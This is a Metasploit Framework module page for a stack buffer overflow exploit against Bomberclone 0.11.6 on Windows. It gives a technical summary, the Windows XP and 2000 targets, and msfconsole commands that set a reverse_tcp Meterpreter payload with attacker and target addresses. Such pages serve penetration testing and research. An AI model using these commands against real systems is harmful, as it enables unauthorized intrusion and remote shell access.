Browse Exploit & Auxiliary Modules

The Metasploit Project hosts the world's largest database of quality assured exploits, including hundreds of remote exploits, auxiliary modules, and payloads. You can even review the Metasploit Framework source code of any module - or write your own.

Search for modules

Bomberclone 0.11.6 Buffer Overflow

This module exploits a stack buffer overflow in Bomberclone 0.11.6 for Windows. The return address is overwritten with lstrcpyA memory address, the second and third value are the destination buffer, the fourth value is the source address of our buffer in the stack. This exploit is like a return in libc. ATTENTION The shellcode is exec ONLY when someone try to close bomberclone.


Rank

  • Average

Authors

  • Jacopo Cervini < acaro [at] jervus.it >

References


Exploit Targets

  • 0 - Windows XP SP2 Italian
  • 1 - Windows 2000 SP1 English
  • 2 - Windows 2000 SP1 English

Development


Similar Modules


Usage Information

$ msfconsole

                ##                          ###           ##    ##
 ##  ##  #### ###### ####  #####   #####    ##    ####        ######
####### ##  ##  ##  ##         ## ##  ##    ##   ##  ##   ###   ##
####### ######  ##  #####   ####  ##  ##    ##   ##  ##   ##    ##
## # ##     ##  ##  ##  ## ##      #####    ##   ##  ##   ##    ##
##   ##  #### ###   #####   #####     ##   ####   ####   #### ###
                                      ##

msf > use exploit/windows/misc/bomberclone_overflow
msf exploit(bomberclone_overflow) > show payloads
msf exploit(bomberclone_overflow) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(bomberclone_overflow) > set LHOST [MY IP ADDRESS]
msf exploit(bomberclone_overflow) > set RHOST [TARGET IP]
msf exploit(bomberclone_overflow) > show targets
msf exploit(bomberclone_overflow) > set TARGET [TARGET ID]
msf exploit(bomberclone_overflow) > exploit


Module Options

RHOST The target address
RPORT The target port (default: 11000)
CHOST The local client address
CPORT The local client port
ContextInformationFile The information file that contains context information
DisablePayloadHandler Disable the handler code for the selected payload
EnableContextEncoding Use transient context when encoding payloads
VERBOSE Enable detailed status messages
WORKSPACE Specify the workspace for this module
WfsDelay Additional delay when waiting for a session